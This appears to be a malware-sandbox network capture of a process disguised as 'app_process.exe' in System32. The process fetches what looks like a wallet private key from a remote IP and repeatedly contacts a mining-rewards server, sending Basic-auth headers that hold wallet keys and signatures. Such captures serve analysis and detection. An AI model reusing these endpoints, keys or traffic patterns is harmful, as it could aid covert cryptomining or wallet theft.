                                                                                                                                                        Data Raw: 38 39 37 35 65 64 32 32 61 30 32 65 34 37 35 66 64 63 33 35 30 37 39 63 39 31 38 39 34 38 34 31 35 32 35 33 38 65 36 37 62 35 34 66 64 30 39 39 37 63 61 38 65 36 32 38 64 30 62 66 64 62 31 37 66 62 31 64 30 62 30 65 61 37 33 31 36 37 64 33 64 64 37 30 34 34 64 34 62 39 61 37 36 33 64 39 66 37 31 64 30 37 62 64 34 64 31 31 66 66 35 34 61 33 34 37 66 31 32 32 64 37 61 34 38 38 64 35 33 33 30 30 61 39 65 63 32 39 37 63 32 34 35 38 35 64 33 33 63 63 61 31 65 62 37 33 38 34 36 31 38 62 34 35 37 35 35 62 65 66 34 32 66 61 32 31 65 32 66 63 36 31 36 38 33 61 33 62 64 33 66 32
                                                                                                                                                        Data Ascii: 8975ed22a02e475fdc35079c9189484152538e67b54fd0997ca8e628d0bfdb17fb1d0b0ea73167d3dd7044d4b9a763d9f71d07bd4d11ff54a347f122d7a488d53300a9ec297c24585d33cca1eb7384618b45755bef42fa21e2fc61683a3bd3f2


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.55001120.2.154.66480804068C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 25, 2024 11:12:16.708179951 CET83OUTGET /admin-api/ore/wallet/getPri HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: 20.2.154.66:48080
                                                                                                                                                        Nov 25, 2024 11:12:18.405009985 CET567INHTTP/1.1 200
                                                                                                                                                        Vary: Origin
                                                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                                                        trace-id:
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: 0
                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                        Content-Length: 192
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:17 GMT
                                                                                                                                                        Data Raw: 65 36 31 36 31 66 34 39 32 39 35 63 62 30 35 65 66 39 31 34 36 32 37 33 61 34 62 38 35 37 39 63 34 35 38 61 64 39 31 66 62 65 38 38 66 39 34 31 66 31 32 66 62 36 62 66 66 65 39 35 66 37 35 38 65 66 32 34 39 33 39 30 30 31 30 62 31 66 64 61 36 35 65 30 66 35 31 66 61 35 31 36 32 31 61 65 36 31 30 63 30 39 64 31 38 66 64 32 31 37 32 64 36 33 30 61 64 38 61 63 64 31 65 30 33 36 37 39 32 64 30 32 31 63 35 37 35 64 61 36 65 38 38 66 33 37 33 66 37 30 61 30 66 64 61 37 39 34 63 36 32 63 30 63 62 38 34 64 33 65 34 37 66 33 39 30 62 63 30 30 31 31 39 33 61 30 64 39 30 62 37 62
                                                                                                                                                        Data Ascii: e6161f49295cb05ef9146273a4b8579c458ad91fbe88f941f12fb6bffe95f758ef249390010b1fda65e0f51fa51621ae610c09d18fd2172d630ad8acd1e036792d021c575da6e88f373f70a0fda794c62c0cb84d3e47f390bc001193a0d90b7b


                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.549785172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:10:58 UTC114OUTGET /miner/rewards?pubkey=4ACz7dexqbAN71zD5WANZLKDYQuhz8D4j6pdkmyKQ91Q HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:10:58 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:10:58 GMT
                                                                                                                                                        Content-Length: 13
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:10:58 UTC13INData Raw: 30 2e 30 34 34 39 36 32 34 39 37 35 37
                                                                                                                                                        Data Ascii: 0.04496249757


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.549786172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:10:58 UTC114OUTGET /miner/rewards?pubkey=7KD5XxiuTcgebvuXysq3sFXGS4A2UZTkANkpjuZJEPro HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:10:58 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:10:58 GMT
                                                                                                                                                        Content-Length: 13
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:10:58 UTC13INData Raw: 30 2e 30 34 34 39 37 39 31 31 36 36 37
                                                                                                                                                        Data Ascii: 0.04497911667


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.549793172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:00 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:00 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:00 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:00 UTC10INData Raw: 31 37 33 32 35 32 39 34 36 30
                                                                                                                                                        Data Ascii: 1732529460


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.549792172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:00 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:00 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:00 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:00 UTC10INData Raw: 31 37 33 32 35 32 39 34 36 30
                                                                                                                                                        Data Ascii: 1732529460


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.549798172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:02 UTC378OUTGET /v2/ws?timestamp=1732529460 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: j+ijabsuJbfoanaXa6e/wg==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M0RVYkdDNGczaGMxYVZ5OEJ4ZXpHWWhEbzVwdDVkeDZRd0dERjZyZEN2eEptMUpkQWVWaUs4ZzlIQUJSRVZWdW1aeG5KVnlqbmJ2Ym1uWTlvcEhKRnJQaw==
                                                                                                                                                        2024-11-25 10:11:02 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:02 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:02 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.549797172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:02 UTC378OUTGET /v2/ws?timestamp=1732529460 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: Pa7nbnXbg02FFMyV6RJt6A==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M2dKM1llU0szcnNQOUNoanltOW9xZXRhR2pZQzVQTEN3bzlnSEpDUEdIWlB1YkV0OHJ5dTZQMndjZE1CNUg1a054ZjRTSjV0aUpoQ25pNW1SNE5zVnB2Rw==
                                                                                                                                                        2024-11-25 10:11:02 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:02 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:02 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.549809172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:07 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:07 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:07 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:07 UTC10INData Raw: 31 37 33 32 35 32 39 34 36 37
                                                                                                                                                        Data Ascii: 1732529467


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.549810172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:07 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:07 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:07 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:07 UTC10INData Raw: 31 37 33 32 35 32 39 34 36 37
                                                                                                                                                        Data Ascii: 1732529467


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.549816172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:08 UTC378OUTGET /v2/ws?timestamp=1732529467 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: kjCthDRqmFKGgW61X8+gcg==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NW9CMW91MzRpU2R3M2tpaEdUV1BEVXFIMm9wR2tpN2FiWEFvenhoUjU0MXpoZkZDTURLclFObWhTTmE3QVFjQlZ3SEw4c3RncGd6UXdlaTFxSjZLZXNNcg==
                                                                                                                                                        2024-11-25 10:11:09 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:09 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:09 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.549817172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:08 UTC378OUTGET /v2/ws?timestamp=1732529467 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: DOpCmHC46XhQJiGoEF5WHA==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NWRQaXo3TERyeXZQVmVibVBWUzRmbURCRjE4QVV5cWJLMThQR2FLVXJ5emFRUnFaY2pwZTZmZTZYZkVCdTQ0cEdFOGVaZjVDQ0hDRFJwUjZmRkVpc0dnVg==
                                                                                                                                                        2024-11-25 10:11:09 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:09 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:09 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.549829172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:13 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:13 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:13 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:13 UTC10INData Raw: 31 37 33 32 35 32 39 34 37 33
                                                                                                                                                        Data Ascii: 1732529473


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.549830172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:13 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:14 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:13 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:14 UTC10INData Raw: 31 37 33 32 35 32 39 34 37 33
                                                                                                                                                        Data Ascii: 1732529473


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.549833172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:15 UTC378OUTGET /v2/ws?timestamp=1732529473 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: 06+qmnMtCAEE2s2ywxV3ug==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86Mm1UTXlqSjZxVTlncUthVXhZTWZtYlZ1eEJ4RjNOaFVBako5TVpYa2NhRldqTXRuTFVxUXJqb0I5VzhZdGp5QWlTS1R1b1VtaU5FMUtUUnhUNkM1WlY0Rg==
                                                                                                                                                        2024-11-25 10:11:15 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:15 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:15 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.549835172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:15 UTC378OUTGET /v2/ws?timestamp=1732529473 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: ACuOhDY8i4K7DEpUKBlvYw==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M3lmRFRWNkZlY1ZzYVJhbnpTcGRQVFlWelF0ZEVvbUZUREhhbUx4V2o4UWF6TktvZGlaU1pab0JoSnNNdHVIbWlZU3dKWWZMaXh3TkhkR2E5NVo5NEdxUg==
                                                                                                                                                        2024-11-25 10:11:15 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:15 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:15 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.549848172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:19 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:20 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:20 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:20 UTC10INData Raw: 31 37 33 32 35 32 39 34 38 30
                                                                                                                                                        Data Ascii: 1732529480


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.549849172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:20 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:20 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:20 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:20 UTC10INData Raw: 31 37 33 32 35 32 39 34 38 30
                                                                                                                                                        Data Ascii: 1732529480


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        16192.168.2.549852172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:21 UTC378OUTGET /v2/ws?timestamp=1732529480 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: uN1+11IrwDzGU8rnhMRxNQ==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M0ZVU2N6UjJndkt3OUZvZE1pbnJSWHd4YVI0THJVa2g1NjZOV2pSa0Z2ekM5a2VCVzhIOXBnR3FtcDhKcjhzQTVUclFCR0VFUXBjVFc2cDhCZUN5MktwSw==
                                                                                                                                                        2024-11-25 10:11:22 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:22 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:22 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        17192.168.2.549853172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:21 UTC374OUTGET /v2/ws?timestamp=1732529480 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: H7m8aVRHdQaFbrlh0idjiA==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6Y29jZUpGRnJWM1dUUXJEQWtOSjlBclZoeGJ0WWtWN2pyd1RMU1ZxRTJ4anJCcmcxZDlQRGltblVmUERORVptQlFob0JGSlQzVENLNkhTWUxSU2tqTWtM
                                                                                                                                                        2024-11-25 10:11:22 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:22 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:22 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        18192.168.2.549866172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:26 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:27 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:26 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:27 UTC10INData Raw: 31 37 33 32 35 32 39 34 38 36
                                                                                                                                                        Data Ascii: 1732529486


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        19192.168.2.549867172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:26 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:27 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:26 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:27 UTC10INData Raw: 31 37 33 32 35 32 39 34 38 36
                                                                                                                                                        Data Ascii: 1732529486


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        20192.168.2.549871172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:28 UTC378OUTGET /v2/ws?timestamp=1732529486 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: TBZMZ12pMHBBoC4mQVa+yA==
